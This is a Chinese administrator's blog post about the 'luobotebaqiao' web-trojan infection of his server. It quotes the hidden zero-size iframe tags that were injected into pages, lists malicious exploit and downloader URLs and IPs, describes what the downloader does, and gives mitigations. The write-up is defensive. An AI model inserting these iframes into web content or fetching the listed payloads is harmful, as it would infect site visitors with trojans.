luobotebaqiao病毒防治临时解决方案

前段时间，自己服务器上中了病毒luobotebaqiao，这个挂马者也真是垃圾。地震期间，竟然把知名的公益网站也给挂马。其良心真是大大地坏啊。刚开始的挂马代码是：<iframe src=http://1.luobotebaqiao.info/index.htm width=0 height=0></iframe>，<iframe src=http://2.luobotebaqiao.info/index.htm width=0 height=0></iframe>
而现在的挂马代码是<iframe src=http://ddd.luobotebaqiao.org/ddddd.htm width=0 height=0></iframe> 看到一个论坛上说的是大名鼎鼎的赛迪网也给它袭击了。我在google搜索的时候，出现这个画面。

中毒现象表现为：用最新的360安全卫士查杀不到，装360的防火墙也无济于事，其他的杀毒软件也都查不出来，但重启主机就暂时又不见了，过一段时间就可能又出现了，周六和周日表现比较频繁;

　　以下是我在网上搜集的资料：

　　http://ddd.luobotebaqiao.org/ddddd.htm

　　http://ddd.luobotebaqiao.org/14.htm MS06014

　　http://ddd.luobotebaqiao.org/rl.htm realone

　　http://ddd.luobotebaqiao.org/new.htm realone11

　　http://ddd.luobotebaqiao.org/lz.htm 联众0DAY

　　http://ddd.luobotebaqiao.org/bf.htm 爆风

　　http://ddd.luobotebaqiao.org/xl.htm 没见到内容. 看名字应该是要挂迅雷的

　　刚刚下了下,以前的记录. 以上几个马. 均跟以前:1.luobotebaqiao.info 中的网马一样.

　　下载者:http://exe.luobotebaqiao.net/w3.exe

　　本人刚刚是准备脱壳,再看下这个东西,下的是什么. 结果,搞半天.也没搞出来.

　　壳脱了,也没看到. 本人又不会用OD 查看下载地址. 准备用嗅探. 嗅下子. 结果,没的工具.

　　所以. 就直接运行了它. 效果不错.

　　直接运行w3.exe 后. 首先会调用进程:svchost.exe 用户名: 当前管理员. 非SYSTEM

　　连接到:222.186.13.200 这个地址.

　　接着. 会连接到60.191.208.235 下载N 多木马. 木马后缀名:msi .

　　如果连接失败. 比如: 本人用IPSEC 将这个IP 封掉. 那么.过几分钟后.

　　会连到:60.191.215.126 将从这里,下载N 多木马. 后缀名:MSI.

　　这两个下载木马的IP 的关系. : 先调用60.191.208.235 这个服务器.

　　如果失败, 再调用60.191.215.126 如果,两个都失败了.则关闭连接. 任意一个成功后,

　　比如: 第一个成功下载下来木马, 完成后关闭连接. 不连第二个.

　　下载下来的木马,均以 msi 后缀来运行.

　　文件名: _qosec0.msi _qosec2.msi 这种类型!

　　从_qosec0.msi 一直到_qosec34.msi . 总共30几个木马.

　　木马所在地: C:\Documents and Settings\Administrator\Local Settings\Temp

　　如果,你使用了本人的软件策略, 那么, 你可以在这里看到. 30几个木马,外加几十个BAT批处理文件.

　　用来删除木马文件的. 并且不会中毒.

　　解决方法：1：在css代码里屏蔽 iframe ，我以前写过文章地址：http://www.admin5.com/article/20071129/63757.shtml，你可以写一个网页把css代码写入，然后保存为html文件，在服务器的IIS文档启用文档页脚把刚才的那个页面附加上，这个页面给everyone读取权限。不过用此法的话，会把JS文件屏蔽掉。

　2：关闭服务器上无用的端口(建议保留80端口和远程桌面端口。如果有FTP的话可以打开21端口，根据情况定，不过建议还是临时关闭ftp端口)，在服务器的防火墙上只开这三个端口。对于杀毒软件可以设置其能访问网络。